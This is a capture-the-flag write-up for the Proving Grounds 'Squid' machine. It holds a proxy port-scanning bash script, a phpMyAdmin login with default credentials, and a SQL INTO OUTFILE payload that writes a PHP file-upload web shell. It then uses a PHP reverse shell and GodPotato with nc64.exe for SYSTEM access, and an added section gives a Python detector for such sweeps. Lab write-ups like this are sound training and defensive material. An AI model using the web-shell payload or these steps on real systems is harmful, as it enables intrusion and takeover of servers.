Squid - Proving Grounds Practice
Enumeration
Nmap
The initial nmap scan revealed that the target was running Squid Proxy.
It was version 4.14.
Exploitation
Squid Proxy
At first I tested the Squid proxy against my own web server and made sure it was working.
Then I created a bash script to enumerate the internal ports of the target.
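#!/bin/bash
# Proxy details
proxy_address="192.168.157.189"
proxy_port="3128"
# Target IP and ports (as seen from the proxy host)
target_ip="127.0.0.1"
ports=("80" "443" "8000" "8080")
for port in "${ports[@]}"; do
    # HEAD request through the proxy; -s hides curl's progress meter, keep the status code of the first response line
    response=$(curl -s -x "$proxy_address:$proxy_port" "$target_ip:$port" -I | grep -i HTTP/1.1 | head -n 1 | cut -d ' ' -f 2)
    # String comparison, so an empty response does not raise "integer expression expected"
    if [ "$response" = "200" ]; then
        echo "Response from $target_ip:$port with status code $response"
    fi
done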
And this revealed that port 8080 was up.
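From the proxy operator's side, the enumeration above shows up in Squid's access log as one client requesting several ports on a loopback address. The following is an added example, not part of the original write-up: a small detector over access.log lines. The log lines, the client addresses and the `min_ports` threshold are constructed assumptions.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines in Squid's native access.log layout:
# time elapsed client action/status bytes method URL user hierarchy type
SAMPLE_LOG = """\
1700000000.101 3 192.168.45.200 TCP_MISS/503 4021 HEAD http://127.0.0.1:80/ - HIER_NONE/- text/html
1700000000.214 2 192.168.45.200 TCP_MISS/503 4021 HEAD http://127.0.0.1:443/ - HIER_NONE/- text/html
1700000000.330 2 192.168.45.200 TCP_MISS/503 4021 HEAD http://127.0.0.1:8000/ - HIER_NONE/- text/html
1700000000.452 9 192.168.45.200 TCP_MISS/200 310 HEAD http://127.0.0.1:8080/ - HIER_DIRECT/127.0.0.1 text/html
1700000007.020 41 10.0.0.5 TCP_MISS/200 1502 GET http://example.com/index.html - HIER_DIRECT/203.0.113.10 text/html
1700000009.700 88 10.0.0.5 TCP_TUNNEL/200 5120 CONNECT example.org:443 - HIER_DIRECT/203.0.113.11 -
1700000012.310 5 10.0.0.5 TCP_MISS/200 120 GET http://10.0.0.20:8080/health - HIER_DIRECT/10.0.0.20 text/plain
"""

def internal_destination(method, url):
    """Return (ip, port) when the request targets a literal loopback/private IP, else None."""
    if method == "CONNECT":              # CONNECT is logged as host:port, not as a URL
        url = "//" + url
    parts = urlsplit(url)
    host = "127.0.0.1" if parts.hostname == "localhost" else parts.hostname
    try:
        addr = ipaddress.ip_address(host or "")
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:                   # ordinary hostname or malformed port
        return None
    if addr.is_loopback or addr.is_private:
        return str(addr), port
    return None

def port_sweeps(log_text, min_ports=3):
    """Map (client, internal_ip) -> sorted ports, for clients that hit >= min_ports distinct ports."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:              # skip truncated or blank lines
            continue
        client, method, url = fields[2], fields[5], fields[6]
        dest = internal_destination(method, url)
        if dest:
            seen[(client, dest[0])].add(dest[1])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_ports}

if __name__ == "__main__":
    for (client, host), ports in port_sweeps(SAMPLE_LOG).items():
        print(f"{client} requested {len(ports)} ports on {host} via the proxy: {ports}")
```

On the Squid side, the built-in `to_localhost` ACL with `http_access deny to_localhost` placed ahead of any allow rule refuses these requests outright.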
I then set up FoxyProxy and started enumerating the target port.
phpMyAdmin
There was a phpMyAdmin application running. I tried the default credentials root: and it worked.
Then I used the SQL query tab to write a file. I found this, which creates an uploader.php file.
SELECT
"<?php echo \'<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">\';echo \'<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Done.<b><br><br>\'; }else { echo \'<b>Upload Failed.</b><br><br>\'; }}?>"
INTO OUTFILE 'C:/wamp/www/uploader.php';
Then I simply uploaded the reverse shell from ivan-sincek/php-reverse-shell and obtained a local service shell.
Then I read the local flag.
Privilege Escalation
SeImpersonatePrivilege
I found out that the current account had SeImpersonatePrivilege on the target.
I simply used GodPotato with nc64.exe to obtain a SYSTEM shell.